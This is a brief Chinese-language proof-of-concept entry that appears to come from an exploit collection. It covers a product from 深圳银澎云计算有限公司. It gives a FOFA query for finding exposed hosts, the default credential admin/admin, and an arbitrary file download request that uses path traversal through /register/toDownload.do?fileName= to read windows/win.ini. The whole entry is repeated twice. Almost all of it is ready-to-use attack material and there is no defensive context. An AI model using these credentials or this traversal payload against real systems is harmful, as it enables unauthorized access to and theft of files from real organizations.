描述
系统存在弱口令和任意文件下载漏洞 fofa “深圳银澎云计算有限公司”
POC & EXP
# 弱口令
admin/admin
任意文件下载
/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)
系统存在弱口令和任意文件下载漏洞 fofa “深圳银澎云计算有限公司”
# 弱口令
admin/admin
任意文件下载
/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)